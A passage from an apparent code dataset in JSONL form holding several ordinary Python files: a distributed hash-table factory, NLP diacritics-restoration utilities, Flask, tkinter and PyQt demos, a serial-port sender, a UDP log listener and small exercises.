DistributedMultiTypeHashTableMpi -> alltoall -> multi_hash_table\n def table_factory(idx):\n return multi_hash_table_ops.MultiHashTable.from_configs(\n configs=slot_to_config,\n hash_filter=hash_filter,\n sync_client=sync_client,\n name_suffix=str(idx))\n\n return distributed_ps_sync.DistributedMultiTypeHashTableMpi(\n shard_num, table_factory, queue_configs)\n\n\ndef create_partitioned_hash_table(\n num_ps: int,\n use_native_multi_hash_table: bool,\n max_rpc_deadline_millis: int = 30,\n hash_filters: List[tf.Tensor] = None,\n sync_clients: List[tf.Tensor] = None,\n enable_gpu_emb: bool = False,\n queue_configs: Dict[str, int] = None,\n) -> distributed_ps.PartitionedHashTable:\n num_ps_tmp = num_ps if num_ps > 0 else 1\n if hash_filters is None:\n hash_filters = [None] * num_ps_tmp\n if sync_clients is None:\n sync_clients = [None] * num_ps_tmp\n\n if use_native_multi_hash_table:\n # assert enable_gpu_emb == False, \"gpu_emb not imple native_multi_hash_table\"\n multi_type_factory = MultiHashTableFactory(hash_filters, sync_clients)\n else:\n\n def multi_type_factory(idx: int, slot_to_config_on_ps):\n\n def factory(name_suffix, config):\n name_suffix = name_suffix if num_ps == 0 else \"_\".join(\n [name_suffix, str(idx)])\n return hash_table_ops.hash_table_from_config(\n config,\n hash_filter=hash_filters[idx],\n name_suffix=name_suffix,\n sync_client=sync_clients[idx])\n\n return multi_type_hash_table.MultiTypeHashTable(slot_to_config_on_ps,\n factory)\n\n return distributed_ps.PartitionedHashTable(num_ps,\n multi_type_factory,\n use_native_multi_hash_table,\n max_rpc_deadline_millis,\n queue_configs=queue_configs)\n","repo_name":"bytedance/monolith","sub_path":"monolith/native_training/distributed_ps_factory.py","file_name":"distributed_ps_factory.py","file_ext":"py","file_size_in_byte":9166,"program_lang":"python","lang":"en","doc_type":"code","stars":702,"dataset":"github-code","pt":"71"}
+{"seq_id":"7867552591","text":"# Find the most commonly occurring word in a page and replace it with it's synonym\n#\"The old man was was very old.\" \n#\"The senior man was was very senior\"\n#the : 1\n#old : 2\n#man : 1\n#was : 2\n\n#edge cases \n#1. empty string returns an empty string\n# 2. If there's a tie, replace the first word with the largest count\n\n#Pseudocode:\n# 1. Converting the string to an array [\"The\", \"old\",....]\n#2.dict with a counter for very single element in our array and poulating it by looping through the array\n#3.Find the maximum key\n#4. Loop through array to find the word that matches the maximum key and assign it a new synonym\nfrom collections import Counter\ndef mostOccuringWord(page, synonym):\n if len(page) == 0:\n return \"\"\n page = list(page.split(' ')) #split string into array \n Word = Counter(page) #creates a counter for each word\n maxKey = max(Word, key = Word.get) #get key with maximum value\n for idx, word in enumerate(page): \n #enumerate goes through an index and an element at once, special python function\n if word == maxKey:\n page[idx] = synonym \n return ' '.join(page) #return a joined string\nprint(mostOccuringWord(\"The old man was was was very old .\", synonym = \"senior\")) \nprint(mostOccuringWord(\"The old man was was very old .\", synonym = \"senior\"))\nprint(mostOccuringWord(\"\", synonym = \"cool\"))\n#Notice the difference in these last 2 print statements bc of the \".\"\nprint(mostOccuringWord( \"geeks for geeks is for geeks . By geeks and for the geeks .\", synonym = \"nerd\"))\nprint(mostOccuringWord( \"geeks for geeks is for geeks. By geeks and for the geeks.\", synonym = \"nerd\"))\n\n#Time complexity 0(n)\n#Space complexity 0(n)\n \n \n \n \n ","repo_name":"Ivy8127/Leetcode-Practise","sub_path":"Mock/mock4.py","file_name":"mock4.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"39750126613","text":"#!/usr/bin/python3\n\"\"\"\nScript that starts a Flask web application\n/states: display a HTML page: (inside the tag BODY)\n/states/: display a HTML page: (inside the tag BODY)\n\"\"\"\nfrom flask import Flask, render_template\nfrom models import storage, State\n\napp = Flask(__name__)\napp.url_map.strict_slashes = False\n\n\n@app.teardown_appcontext\ndef close_context(exception):\n storage.close()\n\n\n@app.route('/states')\n@app.route('/states/')\ndef states_cities_route(id=None):\n # route that fetches all states or a certain state\n states = storage.all(State)\n all_states = []\n\n if id is None:\n for state in states.values():\n all_states.append([state.id, state.name])\n return render_template('9-states.html', states=all_states, id=id)\n else:\n state_list = list(filter(lambda x: x.id == id, states.values()))\n state = None if len(state_list) == 0 else state_list[0]\n city_data = None\n if state:\n cities = state.cities\n cities_list = list(\n filter(lambda x: x.state_id == state.id, cities))\n city_data = list(map(lambda x: [x.id, x.name], cities_list))\n return render_template('9-states.html', state=state, cities=city_data, id=id)\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"ErmiasBahru/AirBnB_clone_v2","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"4693850236","text":"import logging\nimport os\nimport pickle\nimport sys\nimport unicodedata\nfrom enum import Enum\nfrom typing import List, Optional, Tuple\n\nimport numpy as np\nimport torch\nfrom dataclasses import dataclass\nfrom filelock import FileLock\nfrom torch import nn\nfrom torch.utils.data.dataset import Dataset\n\nimport diacritization_stripping_data\nfrom transformers import PreTrainedTokenizer\n\nnp.random.seed(42)\n\n\ndef strip_diacritics(text):\n d_map = diacritization_stripping_data.strip_diacritization_uninames\n output = \"\"\n for c in text:\n if c in d_map:\n output += d_map[c]\n else:\n output += c\n\n return output\n\n\nlogger = logging.getLogger(__name__)\n\n@dataclass\nclass InputFeatures:\n \"\"\"\n A single set of features of data.\n Property names are the same names as the corresponding inputs to a model.\n \"\"\"\n\n input_ids: List[int]\n attention_mask: List[int]\n token_type_ids: Optional[List[int]] = None\n label_ids: Optional[List[int]] = None\n\n\n@dataclass\nclass PredictInputFeatures:\n \"\"\"\n A single set of features of data.\n Property names are the same names as the corresponding inputs to a model.\n \"\"\"\n\n input_ids: List[int]\n attention_mask: List[int]\n token_type_ids: Optional[List[int]] = None\n\n\nclass Split(Enum):\n train = \"train\"\n dev = \"dev\"\n test = \"test\"\n\n\nclass DiacritizationDataset(Dataset):\n features: List[InputFeatures]\n pad_token_label_id: int = nn.CrossEntropyLoss().ignore_index\n\n # Use cross entropy ignore_index as padding label id so that only\n # real label ids contribute to the loss later.\n\n def __init__(\n self,\n data_dir: str,\n input_train_file: str,\n target_train_file: str,\n input_dev_file: str,\n target_dev_file: str,\n input_test_file: str,\n target_test_file: str,\n tokenizer: PreTrainedTokenizer,\n labels: List[str],\n model_type: str,\n max_seq_length: Optional[int] = None,\n overwrite_cache=False,\n mode: Split = Split.train,\n ):\n '''\n\n :param lang: either concrete language (e.g. cs) or 'all' that means include all languages\n :param tokenizer:\n :param labels:\n :param model_type:\n :param max_seq_length:\n :param overwrite_cache:\n :param mode:\n '''\n\n self.label_map = {label: i for i, label in enumerate(labels)}\n self.model_type = model_type\n self.max_seq_length = max_seq_length\n self.tokenizer = tokenizer\n\n # Load data features from cache or dataset file\n cached_examples_file = os.path.join(\n data_dir, \"cached_{}_{}_{}\".format(mode.value, tokenizer.__class__.__name__, str(max_seq_length)),\n )\n\n # Make sure only the first process in distributed training processes the dataset,\n # and the others will use the cache.\n lock_path = cached_examples_file + \".lock\"\n with FileLock(lock_path):\n\n if os.path.exists(cached_examples_file) and not overwrite_cache:\n logger.info(f\"Loading examples from cached file {cached_examples_file}\")\n with open(cached_examples_file, 'rb') as f:\n self.examples = pickle.load(f)\n else:\n logger.info(f\"Creating examples from dataset file at {data_dir}\")\n\n if isinstance(mode, Split):\n mode = mode.value\n\n logger.info(f\"Processing {mode} data\")\n\n if mode == 'test':\n self.examples = read_examples_from_disk(input_test_file, target_test_file)\n elif mode == 'dev':\n self.examples = read_examples_from_disk(input_dev_file, target_dev_file)\n elif mode == 'train':\n self.examples = read_examples_from_disk(input_train_file, target_train_file)\n\n logger.info(f\"Saving features into cached file {cached_examples_file}\")\n\n with open(cached_examples_file, 'wb') as f:\n pickle.dump(self.examples, f)\n\n # torch.save(self.examples, cached_examples_file)\n self.random_examples_permutation = np.arange(len(self.examples))\n np.random.shuffle(self.random_examples_permutation)\n\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, i) -> InputFeatures:\n # start_time = time.time()\n while True:\n try:\n example = self.examples[self.random_examples_permutation[i]]\n\n features = convert_example_to_features(\n example,\n self.label_map,\n self.max_seq_length,\n self.tokenizer,\n cls_token_at_end=bool(self.model_type in [\"xlnet\"]),\n # xlnet has a cls token at the end\n cls_token=self.tokenizer.cls_token,\n cls_token_segment_id=2 if self.model_type in [\"xlnet\"] else 0,\n sep_token=self.tokenizer.sep_token,\n sep_token_extra=False,\n # roberta uses an extra separator b/w pairs of sentences, cf. github.com/pytorch/fairseq/commit/1684e166e3da03f5b600dbb7855cb98ddfcd0805\n pad_on_left=bool(self.tokenizer.padding_side == \"left\"),\n pad_token=self.tokenizer.pad_token_id,\n pad_token_segment_id=self.tokenizer.pad_token_type_id,\n pad_token_label_id=self.pad_token_label_id,\n replace_with_copy_instruction=True,\n use_instructions_as_labels=True\n )\n\n break\n\n # logging.info(\"time per item: {}\".format(time.time() - start_time))\n except Exception as e:\n raise e\n # print(\"Trying another example i+1\")\n # i += 1\n\n return features\n\n\nclass FileIteratorDataset(Dataset):\n features: List[InputFeatures]\n pad_token_label_id: int = nn.CrossEntropyLoss().ignore_index\n\n # Use cross entropy ignore_index as padding label id so that only\n # real label ids contribute to the loss later.\n\n def __init__(\n self,\n file: str,\n tokenizer: PreTrainedTokenizer,\n model_type: str,\n labels\n ):\n '''\n\n :param lang: either concrete language (e.g. cs) or 'all' that means include all languages\n :param data_dir:\n :param tokenizer:\n :param labels:\n :param model_type:\n :param max_seq_length:\n :param overwrite_cache:\n :param mode:\n '''\n\n self.model_type = model_type\n self.tokenizer = tokenizer\n self.label_map = {label: i for i, label in enumerate(labels)}\n\n self.examples = []\n\n with open(file, encoding='utf-8') as f:\n for line in f:\n line = line.strip()\n self.examples.append(line)\n\n def __len__(self):\n return len(self.examples)\n\n\n def __getitem__(self, i):\n # start_time = time.time()\n example = self.examples[i]\n\n ## START PARAMS\n cls_token_at_end = bool(self.model_type in [\"xlnet\"])\n cls_token = self.tokenizer.cls_token\n cls_token_segment_id = 2 if self.model_type in [\"xlnet\"] else 0\n sep_token = self.tokenizer.sep_token\n sep_token_extra = False\n # roberta uses an extra separator b/w pairs of sentences, cf. github.com/pytorch/fairseq/commit/1684e166e3da03f5b600dbb7855cb98ddfcd0805\n pad_on_left = bool(self.tokenizer.padding_side == \"left\")\n pad_token = self.tokenizer.pad_token_id\n pad_token_segment_id = self.tokenizer.pad_token_type_id\n pad_token_label_id = self.pad_token_label_id\n sequence_a_segment_id = 0\n mask_padding_with_zero = True\n ## END PARAMS\n\n tokens = self.tokenizer.tokenize(example)\n unk_token = self.tokenizer.unk_token\n all_special_tokens_extended = self.tokenizer.all_special_tokens_extended\n\n # TODO remove this once training is corrected\n nohashes = []\n for token in tokens:\n if token in all_special_tokens_extended and token != unk_token:\n continue\n\n nohashes.append(token)\n\n tokens = nohashes\n\n # The convention in BERT is:\n # (a) For sequence pairs:\n # tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]\n # type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1\n # (b) For single sequences:\n # tokens: [CLS] the dog is hairy . [SEP]\n # type_ids: 0 0 0 0 0 0 0\n #\n # Where \"type_ids\" are used to indicate whether this is the first\n # sequence or the second sequence. The embedding vectors for `type=0` and\n # `type=1` were learned during pre-training and are added to the wordpiece\n # embedding vector (and position vector). This is not *strictly* necessary\n # since the [SEP] token unambiguously separates the sequences, but it makes\n # it easier for the model to learn the concept of sequences.\n #\n # For classification tasks, the first vector (corresponding to [CLS]) is\n # used as as the \"sentence vector\". Note that this only makes sense because\n # the entire model is fine-tuned.\n tokens += [sep_token]\n if sep_token_extra:\n # roberta uses an extra separator b/w pairs of sentences\n tokens += [sep_token]\n segment_ids = [sequence_a_segment_id] * len(tokens)\n\n if cls_token_at_end:\n tokens += [cls_token]\n segment_ids += [cls_token_segment_id]\n else:\n tokens = [cls_token] + tokens\n segment_ids = [cls_token_segment_id] + segment_ids\n\n input_ids = self.tokenizer.convert_tokens_to_ids(tokens)\n # The mask has 1 for real tokens and 0 for padding tokens. Only real\n # tokens are attended to.\n input_mask = [1 if mask_padding_with_zero else 0] * len(input_ids)\n\n if \"token_type_ids\" not in self.tokenizer.model_input_names:\n segment_ids = None\n\n # logging.info(\"time per item: {}\".format(time.time() - start_time))\n return {\"input_ids\": torch.Tensor([input_ids]).long(),\n \"attention_mask\": torch.Tensor([input_mask]).long(),\n \"token_type_ids\": torch.Tensor([segment_ids]).long()}\n\n\ndef read_examples_from_disk(\n input_file: str,\n target_file: str,\n sentences_per_dataset=sys.maxsize\n) -> List[Tuple[str, str]]:\n # start code\n\n guid_index = 1\n examples = []\n\n with open(input_file, encoding='utf-8') as inp_f, open(target_file,\n encoding='utf-8') as tar_f:\n for line_index, (input_line, target_line) in enumerate(zip(inp_f, tar_f)):\n if line_index > sentences_per_dataset:\n break\n\n input_line, target_line = input_line.strip('\\n'), target_line.strip('\\n')\n if not input_line:\n continue\n\n # examples.append(InputExample(nodia=input_line, dia=target_line))\n examples.append(target_line)\n guid_index += 1\n\n return examples\n\n\ndef convert_example_to_features(\n example: Tuple[str, str],\n label_map,\n max_seq_length: int,\n tokenizer: PreTrainedTokenizer,\n cls_token_at_end=False,\n cls_token=\"[CLS]\",\n cls_token_segment_id=1,\n sep_token=\"[SEP]\",\n sep_token_extra=False,\n pad_on_left=False,\n pad_token=0,\n pad_token_segment_id=0,\n pad_token_label_id=-100,\n sequence_a_segment_id=0,\n mask_padding_with_zero=True,\n replace_with_copy_instruction=True,\n use_instructions_as_labels=True\n) -> InputFeatures:\n \"\"\" Loads a data file into a list of `InputFeatures`\n `cls_token_at_end` define the location of the CLS token:\n - False (Default, BERT/XLM pattern): [CLS] + A + [SEP] + B + [SEP]\n - True (XLNet/GPT pattern): A + [SEP] + B + [SEP] + [CLS]\n `cls_token_segment_id` define the segment id associated to the CLS token (0 for BERT, 2 for XLNet)\n \"\"\"\n target_line = example\n input_line = strip_diacritics(target_line)\n\n aligned_tokens = get_aligned_tokens(input_line, target_line, tokenizer)\n tokens_dia_ids = [] # labels\n\n tokens_nodia = []\n for aligned_token in aligned_tokens:\n nodia_token, dia_token = aligned_token\n tokens_nodia.append(nodia_token)\n\n if not use_instructions_as_labels:\n if replace_with_copy_instruction and dia_token == nodia_token:\n tokens_dia_ids.append(label_map[\"\"])\n elif nodia_token == tokenizer.unk_token:\n if replace_with_copy_instruction:\n tokens_dia_ids.append(label_map[\"\"])\n else:\n tokens_dia_ids.append(label_map[\"\"])\n elif dia_token not in label_map:\n tokens_dia_ids.append(label_map[\"\"])\n else:\n tokens_dia_ids.append(label_map[dia_token])\n else:\n if dia_token == nodia_token:\n tokens_dia_ids.append(label_map[\"\"])\n elif nodia_token == tokenizer.unk_token:\n tokens_dia_ids.append(label_map[\"\"])\n else:\n dia_token_instructions = _text_to_dia_instructions(dia_token)\n if dia_token_instructions not in label_map:\n tokens_dia_ids.append(label_map[\"\"])\n else:\n tokens_dia_ids.append(label_map[dia_token_instructions])\n\n # Account for [CLS] and [SEP] with \"- 2\" and with \"- 3\" for RoBERTa.\n special_tokens_count = tokenizer.num_special_tokens_to_add()\n if len(tokens_nodia) > max_seq_length - special_tokens_count:\n tokens_nodia = tokens_nodia[: (max_seq_length - special_tokens_count)]\n tokens_dia_ids = tokens_dia_ids[: (max_seq_length - special_tokens_count)]\n\n # The convention in BERT is:\n # (a) For sequence pairs:\n # tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]\n # type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1\n # (b) For single sequences:\n # tokens: [CLS] the dog is hairy . [SEP]\n # type_ids: 0 0 0 0 0 0 0\n #\n # Where \"type_ids\" are used to indicate whether this is the first\n # sequence or the second sequence. The embedding vectors for `type=0` and\n # `type=1` were learned during pre-training and are added to the wordpiece\n # embedding vector (and position vector). This is not *strictly* necessary\n # since the [SEP] token unambiguously separates the sequences, but it makes\n # it easier for the model to learn the concept of sequences.\n #\n # For classification tasks, the first vector (corresponding to [CLS]) is\n # used as as the \"sentence vector\". Note that this only makes sense because\n # the entire model is fine-tuned.\n tokens_nodia += [sep_token]\n tokens_dia_ids += [pad_token_label_id]\n if sep_token_extra:\n # roberta uses an extra separator b/w pairs of sentences\n tokens_nodia += [sep_token]\n tokens_dia_ids += [pad_token_label_id]\n segment_ids = [sequence_a_segment_id] * len(tokens_nodia)\n\n if cls_token_at_end:\n tokens_nodia += [cls_token]\n tokens_dia_ids += [pad_token_label_id]\n segment_ids += [cls_token_segment_id]\n else:\n tokens_nodia = [cls_token] + tokens_nodia\n tokens_dia_ids = [pad_token_label_id] + tokens_dia_ids\n segment_ids = [cls_token_segment_id] + segment_ids\n\n input_ids = tokenizer.convert_tokens_to_ids(tokens_nodia)\n\n # The mask has 1 for real tokens and 0 for padding tokens. Only real\n # tokens are attended to.\n input_mask = [1 if mask_padding_with_zero else 0] * len(input_ids)\n\n # Zero-pad up to the sequence length.\n padding_length = max_seq_length - len(input_ids)\n if pad_on_left:\n input_ids = ([pad_token] * padding_length) + input_ids\n input_mask = ([0 if mask_padding_with_zero else 1] * padding_length) + input_mask\n segment_ids = ([pad_token_segment_id] * padding_length) + segment_ids\n tokens_dia_ids = ([pad_token_label_id] * padding_length) + tokens_dia_ids\n else:\n input_ids += [pad_token] * padding_length\n input_mask += [0 if mask_padding_with_zero else 1] * padding_length\n segment_ids += [pad_token_segment_id] * padding_length\n tokens_dia_ids += [pad_token_label_id] * padding_length\n\n assert len(input_ids) == max_seq_length\n assert len(input_mask) == max_seq_length\n assert len(segment_ids) == max_seq_length\n assert len(tokens_dia_ids) == max_seq_length\n\n # if ex_index < 5:\n # logger.info(\"*** Example ***\")\n # # logger.info(\"guid: %s\", example.guid)\n # logger.info(\"tokens: %s\", \" \".join([str(x) for x in tokens_nodia]))\n # logger.info(\"input_ids: %s\", \" \".join([str(x) for x in input_ids]))\n # logger.info(\"input_mask: %s\", \" \".join([str(x) for x in input_mask]))\n # logger.info(\"segment_ids: %s\", \" \".join([str(x) for x in segment_ids]))\n # logger.info(\"label_ids: %s\", \" \".join([str(x) for x in tokens_dia_ids]))\n\n if \"token_type_ids\" not in tokenizer.model_input_names:\n segment_ids = None\n\n return InputFeatures(input_ids=input_ids, attention_mask=input_mask, token_type_ids=segment_ids,\n label_ids=tokens_dia_ids)\n\n\ndef get_aligned_tokens(input_line, target_line, tokenizer):\n unk_token = tokenizer.unk_token\n\n if not tokenizer.is_fast:\n raise ValueError(\"Do use fast tokenizer!\")\n\n else:\n tokens_nodia_alignment = get_token_source_mapping(input_line, tokenizer)\n tokens_nodia = []\n tokens_dia = []\n\n for cur_tok, cur_tok_start, cur_tok_end in tokens_nodia_alignment:\n tokens_nodia.append(cur_tok)\n tokens_dia.append(target_line[cur_tok_start:cur_tok_end])\n\n aligned_tokens = []\n for token_nodia, token_dia in zip(tokens_nodia, tokens_dia):\n if token_nodia.startswith('##') and not token_dia.startswith('##'):\n token_dia = '##' + token_dia\n\n if token_nodia.startswith('▁') and not token_dia.startswith('▁'):\n token_dia = '▁' + token_dia\n\n if len(token_nodia) == len(token_dia):\n aligned_tokens.append([token_nodia, token_dia])\n\n return aligned_tokens\n\n\ndef normalize_text_from_tokenizer(text: str):\n # when constructing instruction for ##mne -> ##mně, ignore ## so that instruction is the same as for mne -> mně (less instructions)\n if text.startswith(\"##\"):\n text = text[2:]\n\n if text.startswith('▁'):\n text = text[1:]\n\n return text\n\n\ndef dia_instructions_to_text(text: str, dia_instructions):\n if dia_instructions == '' or dia_instructions == '':\n return text\n\n text = normalize_text_from_tokenizer(text)\n\n text = list(text)\n instructions = dia_instructions.split(';')\n for instruction in instructions:\n c_index, c_name_after_first_with = instruction.split(':')\n c_index = int(c_index)\n\n if c_index < len(text):\n c_name = unicodedata.name(text[c_index]) + \" WITH \" + c_name_after_first_with\n try:\n c_name = unicodedata.lookup(c_name)\n text[c_index] = c_name\n except KeyError:\n logging.info(f'{c_name} not found')\n else:\n logging.info(f'Skipping, because attempted {dia_instructions} on {text}, specifically {instruction}')\n\n return \"\".join(text)\n\n\ndef _text_to_dia_instructions(text: str):\n text = normalize_text_from_tokenizer(text)\n\n converted_label = []\n for c_index, c in enumerate(text):\n if strip_diacritics(c) != c:\n c_name = unicodedata.name(c)\n if 'WITH' in c_name:\n first_index_of_with = c_name.index(\"WITH\")\n c_name_after_first_with = c_name[first_index_of_with + 4 + 1:]\n converted_label.append(f\"{c_index}:{c_name_after_first_with}\")\n\n if converted_label:\n return \";\".join(converted_label)\n else:\n return \"\"\n\n\ndef get_token_source_mapping(input_line, tokenizer):\n unk_token = tokenizer.unk_token\n\n if not tokenizer.is_fast:\n raise ValueError('Not supported, must use Fast tokenizer!')\n else:\n input_line_encoded = tokenizer(input_line)\n input_line_tokens = tokenizer.convert_ids_to_tokens(input_line_encoded['input_ids'])\n input_line_tokens_special_out = []\n for input_line_token in input_line_tokens:\n # skip all special tokens (e.g. [CLS], [PAD]) - these are added later, but not unknown token\n if input_line_token in tokenizer.all_special_tokens_extended and input_line_token != unk_token:\n continue\n\n input_line_tokens_special_out.append(input_line_token)\n input_line_tokens = input_line_tokens_special_out\n\n input_line_char_to_token_indices = [input_line_encoded.char_to_token(i) for i in range(len(input_line))]\n aligned_tokens = [[x, None, None] for x in input_line_tokens]\n for i in range(len(input_line)):\n cur_char_word_ind = input_line_char_to_token_indices[i]\n\n if cur_char_word_ind is None:\n continue\n\n cur_char_word_ind = cur_char_word_ind - 1 # char_to_token indexes from 1\n if aligned_tokens[cur_char_word_ind][1] is None:\n aligned_tokens[cur_char_word_ind][1] = i\n\n aligned_tokens[cur_char_word_ind][2] = i + 1\n\n for i in range(len(aligned_tokens)):\n if i > 0 and aligned_tokens[i][1] is None:\n aligned_tokens[i][1] = aligned_tokens[i - 1][1]\n aligned_tokens[i][2] = aligned_tokens[i - 1][2]\n\n if len(aligned_tokens) != len(input_line_tokens):\n print(input_line)\n print(aligned_tokens)\n print(input_line_tokens)\n raise ValueError()\n return aligned_tokens\n\n\ndef get_labels(path: str) -> List[str]:\n # now only instructions are supported\n labels = dict()\n with open(path, \"r\", encoding='utf-8') as f:\n for line in f:\n line = line.strip()\n dia_token, count = line.split('\\t')\n if len(dia_token) > 2 and (dia_token[0] == dia_token[-1] == \"\\\"\" or dia_token[0] == dia_token[-1] == \"'\"):\n dia_token = dia_token[1:-1]\n\n if strip_diacritics(dia_token) != dia_token:\n converted_label = _text_to_dia_instructions(dia_token)\n\n if converted_label not in labels:\n labels[converted_label] = 0\n\n labels[converted_label] += int(count)\n else:\n if '' not in labels:\n labels[''] = 0\n labels[''] += int(count)\n\n print(f'Original instruction count {len(labels)}')\n # filter out labels that occured only once (CommonCrawl outliers)\n filtered_labels = []\n for label, label_count in labels.items():\n if label_count >= 2:\n filtered_labels.append(label)\n\n print('Filtering out instructions that occurred only once....')\n print(\n f'New instruction set size: {len(filtered_labels)}. That is, we filtered out {len(labels) - len(filtered_labels)}')\n # append UNK\n labels = [\"\", \"\"] + filtered_labels\n return labels\n","repo_name":"ufal/bert-diacritics-restoration","sub_path":"utils_diacritization.py","file_name":"utils_diacritization.py","file_ext":"py","file_size_in_byte":23820,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"}
+{"seq_id":"22757719406","text":"import time\nimport serial\n\nser = serial.Serial(\n port='/dev/ttyS0', #Replace ttyS0 with ttyAM0 for Pi1,Pi2,Pi0\n baudrate = 115200,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=1\n)\n\ncounter=0\n\nwhile 1: \n\t# Convert the Unicode string to bytes\n\tmessage = f'Write counter: {counter} \\n'\n\tencoded_message = message.encode()\n\tser.write(encoded_message)\n\ttime.sleep(1) \n\tcounter += 1\n","repo_name":"2IIZ/Python","sub_path":"12_raspberrypi_gpio/Serial communication/ch340-sender.py","file_name":"ch340-sender.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"29042987803","text":"from socket import socket, AF_INET, SOCK_DGRAM\n\nHOST = '0.0.0.0'\nPORT = 12322\n\ns = socket(AF_INET, SOCK_DGRAM)\ns.bind((HOST, PORT))\n\nbuffers = {}\n\nwhile True:\n data, (address, port) = s.recvfrom(8192)\n data = data.decode('utf-8')\n if not address in buffers:\n buffers[address] = \"\"\n buffers[address] += data\n lines = buffers[address].split('\\n')\n buffers[address] = lines.pop()\n for line in lines:\n print(\"[{}] {}\".format(address, line))\n\ns.close()\n","repo_name":"Whatever-Co/zorozoro-experiments","sub_path":"04-esp32/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"71"}
+{"seq_id":"27549965167","text":"\ndef firstfunction(filename):\n with open('Data Files/' + filename, 'r') as f:\n data = f.readlines()\n return data\n '''if numbers == False:\n return data\n\n \n intdata = []\n for line in data:\n intdata.append(int(line))\n return intdata\n\n\ndef buildings():\n buildingsData = firstfunction('buildings10.txt', True)\n print(max(buildingsData))'''\n\ndef longword():\n words = firstfunction('manyWords.txt')\n newWords = []\n for word in words:\n newWords.append(word.strip())\n print(newWords)\n leng = 0\n for word in words:\n if len(word) > leng:\n leng = len(word)\n big = word\n print(big)\n\nif __name__ == \"__main__\":\n #print(firstfunction('sample.txt', True))\n #buildings()\n longword()\n\n","repo_name":"ethanglaser/Python-Tutoring","sub_path":"Code from lessons/lesson12.py","file_name":"lesson12.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"38369040261","text":"import PyQt6.QtGui\nimport PyQt6.QtWidgets\nimport functools\nimport sys\n\napp = PyQt6.QtWidgets.QApplication([])\napp.setQuitOnLastWindowClosed(False)\n\n# Create the icon\nicon = PyQt6.QtGui.QIcon(\"./dist/giftray/icons/red/windows_MuteUnmute2.ico\")\nprint(icon.availableSizes ()==[])\nicon = PyQt6.QtGui.QIcon(sys.executable)\nprint(icon.availableSizes ()==[])\n\ndef act(s):\n print(s)\n return\n\n# Create the tray\ntray = PyQt6.QtWidgets.QSystemTrayIcon()\ntray.setIcon(icon)\ntray.setToolTip(\"System Tray Management\")\ntray.setVisible(True)\n\n# Create the menu\nmenu = PyQt6.QtWidgets.QMenu()\naction = PyQt6.QtGui.QAction(\"A menu item\")\nmenu.addAction(action)\n\naction2 = PyQt6.QtGui.QAction(PyQt6.QtGui.QIcon(\"./dist/giftray/icons/red/windows_MuteUnmute.ico\"), \"With image menu\")\n#action2.setObjectName('action to print')\naction2.triggered.connect(functools.partial(act, 'action to print'))\nmenu.addAction(action2)\n\nmenu.addSeparator()\n# Add a Quit option to the menu.\nquit = PyQt6.QtGui.QAction(\"Quit\")\nquit.triggered.connect(app.quit)\nmenu.addAction(quit)\n\n# Add the menu to the tray\ntray.setContextMenu(menu)\n\nclass Window(PyQt6.QtWidgets.QWidget):\n def __init__(self):\n super(Window, self).__init__()\n\n icons = sorted([attr for attr in dir(PyQt6.QtWidgets.QStyle.StandardPixmap) if attr.startswith(\"SP_\")])\n layout = PyQt6.QtWidgets.QGridLayout()\n\n for n, name in enumerate(icons):\n btn = PyQt6.QtWidgets.QPushButton(name)\n\n pixmapi = getattr(PyQt6.QtWidgets.QStyle.StandardPixmap, name)\n icon = self.style().standardIcon(pixmapi)\n btn.setIcon(icon)\n layout.addWidget(btn, int(n/4), int(n%4))\n\n self.setLayout(layout)\n\n\n\nw = Window()\nw.show()\n\n\napp.exec()\n","repo_name":"cadeauthom/giftray_py","sub_path":"test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"39020423575","text":"import turtle\r\nfrom tkinter import *\r\n\r\nwindow = Tk()\r\nwindow.title(\"My first GUI program\")\r\nwindow.minsize(width=500, height=300)\r\n\r\nmy_label = Label(text=\"I m a label\", font=(\"Arial\", 24, \"bold\"))\r\nmy_label.grid(row=0, column=0)\r\n\r\n\r\ndef button_click():\r\n new = input_sth.get()\r\n my_label[\"text\"] = input_sth.get()\r\n\r\n\r\nbutton = Button(text=\"click me\", command=button_click)\r\nbutton.grid(row=1, column=1)\r\n\r\n\r\ndef button_clicked():\r\n new = input_sth.get()\r\n my_label[\"text\"] = new\r\n\r\n\r\nbutton = Button(text=\"new button\", command=button_clicked)\r\nbutton.grid(row=0, column=3)\r\n\r\ninput_sth = Entry(width=10)\r\ninput_sth.grid(row=3, column=3)\r\n\r\n\r\nwindow.mainloop()\r\n","repo_name":"germainsafari/100-days-of-code-bootcamp","sub_path":"100daysofcode/day-27/thinker.py","file_name":"thinker.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
